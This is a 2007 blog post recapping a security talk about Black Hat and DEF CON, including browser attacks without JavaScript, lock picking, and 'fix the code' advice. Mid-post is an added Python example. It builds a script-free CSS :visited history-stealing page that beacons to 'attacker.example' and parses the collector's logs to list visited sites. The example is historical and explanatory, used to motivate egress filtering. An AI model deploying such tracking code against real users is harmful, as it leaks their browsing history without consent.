Pseudo-liveblogging: GeekSouth

I attended my first GeekSouth dinner.

Tonight I'm attending a dinner with a group called GeekSouth, where there will be a speaker on information security. Since there's no wireless here in the restaurant, this will only be pseudo-liveblogging: I'll be typing everything live, but I'll have to wait until I get home to post it all.
Our speaker for tonight is Erik W. Rolf, President of Deliberare, Inc. I see he's on a PowerBook as well and using Keynote '08 - I already like him. Juan does the introduction and we're off. Tonight we're going to cover the time he spent in Vegas at Black Hat and DEF CON, two big hacker conferences, plus some "news you can use".

Black Hat

- Grossman and Hansen, "Fun with and without JavaScript Malware". The interesting thing is that everyone says you can turn JavaScript off and be safe, but that's actually not true anymore: "New research has revealed that even if Javascript has been disabled or restricted, some now popular attack techniques - such as Browser Intranet Hacking, Port Scanning and History Stealing can still be perpetrated." Corporations spend a lot of money on firewalls, NATed addresses and the like, but that filters what comes IN to the network. These attacks are dangerous for what they send OUT of the network, and because they ride on ordinary web traffic the inbound filtering never sees them. How do we stop that? One way is egress filtering in the corporate environment, which targets the traffic going out to the web and can block some of the malicious requests. Another option is personal firewall software, which should be able to block some of these attacks.

Other interesting talks:
- Brad Hill, "Attacking XML Security", highlighting some of the dangers in the AJAX security model.
- Sullivan and Hoffman, "Premature AJAX-ulation".
- "NACATTACK", attacks on Cisco's Network Admission Control, the software that is supposed to secure visiting laptop users on corporate networks.

He showed us a video of picking physical locks with all sorts of crazy stuff: a Kryptonite lock with a ballpoint pen, a Master lock with an electric toothbrush, and a Kensington lock (the little cables that everyone has a slot for on his laptop) with a roll of toilet paper!
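The "history stealing without JavaScript" technique named above worked by abusing the CSS `:visited` selector: the browser styled a link differently once the user had visited it, and a background image on that style made the browser fetch a beacon URL for exactly the visited links, with no script involved. The following is an added example, not code from the original post or from the Grossman and Hansen talk, showing both sides of that leak: a page builder that emits a script-free probe page, and the collector logic that turns the beacon requests into a list of visited sites. The host `attacker.example`, the candidate URLs and the logged request lines are all constructed for the example. Browsers closed this leak around 2010 (Firefox 4, Chrome 9) by restricting what `:visited` may style, so it is a historical illustration of why the outbound direction matters.

```python
"""
Added example: the pre-2010 CSS :visited history leak, attacker page and
collector side.  All hosts, URLs and log lines are made up for the example.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlparse

BEACON_HOST = "attacker.example"  # hypothetical collector host


def build_probe_page(candidates):
    """Return an HTML page containing no <script>.  Each candidate URL gets a
    link plus a :visited rule whose background image points at our beacon, so
    the browser issues a GET to the beacon only for links it has in history."""
    rules, links = [], []
    for i, url in enumerate(candidates):
        beacon = f"http://{BEACON_HOST}/v?u={quote(url, safe='')}"
        rules.append(f"#l{i}:visited {{ background: url('{beacon}'); }}")
        links.append(
            f'<a id="l{i}" href="{escape(url, quote=True)}">{escape(url)}</a>'
        )
    return (
        "<!doctype html><html><head><style>\n"
        + "\n".join(rules)
        + "\n</style></head><body>\n"
        + "\n".join(links)
        + "\n</body></html>\n"
    )


def visited_from_beacons(request_lines):
    """Collector side: given request lines as the beacon server would log them
    (method, path, version), recover the candidate URLs the victim visited."""
    visited = set()
    for line in request_lines:
        method, path, _version = line.split(" ", 2)
        parsed = urlparse(path)
        if method == "GET" and parsed.path == "/v":
            # parse_qs already percent-decodes the original URL for us
            for original_url in parse_qs(parsed.query).get("u", []):
                visited.add(original_url)
    return visited


if __name__ == "__main__":
    # Constructed candidate list: an intranet host and a banking login page.
    page = build_probe_page(
        ["http://intranet.corp.example/", "https://bank.example/login"]
    )
    print(page)
    # Constructed server log: the victim had been to the intranet host only.
    log = [
        "GET /v?u=http%3A%2F%2Fintranet.corp.example%2F HTTP/1.1",
        "GET /favicon.ico HTTP/1.1",
    ]
    print(visited_from_beacons(log))
```

Note that the information leaves the victim's network as plain outbound HTTP GETs to a host the victim never meant to talk to, which is precisely the traffic a firewall that only inspects inbound connections ignores. That is the point behind the speaker's suggestion of egress filtering or a personal firewall: only a control that looks at what workstations send OUT has any chance of noticing or blocking the beacon.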
DEF CON 15: "Dirty Secrets of the Security Industry"

- Defense in depth is dead (at least as we know it): the extra layers are really just a means of protecting poorly written software.
- You can't train everyone: even if you do, they won't always do what they're told.
- Network security is dead: see the JavaScript talk above.
- Full disclosure is dead: full disclosure is when you find a vulnerability in a browser or other piece of software and publish it widely to force the vendor to fix it. The problem is that much of today's hacking is actually run by organized crime. If they find an exploitable bug, they will most likely use it rather than disclose it, because they don't want it patched.

So what to do? Fix the $#%&ing code:
- Type safety
- Secure coding taught to ALL CS majors
- Trusted computing
- At the very least, we need better software controls on our systems, not better firewalls.

News you can use:
- Privacy is pretty much dead. There's a lot of data out there about us, and people keep finding it (e.g. the recent TJX (TJ Maxx) compromise).
- Vulnerabilities are way up. A SANS email just this week said it was the largest batch of critical exploits it has ever seen in one week.

So what do we do?
- Talk to Erik at Deliberare :)
- Use a Mac (amen!)

Posted: Tue - August 21, 2007 at 06:56 PM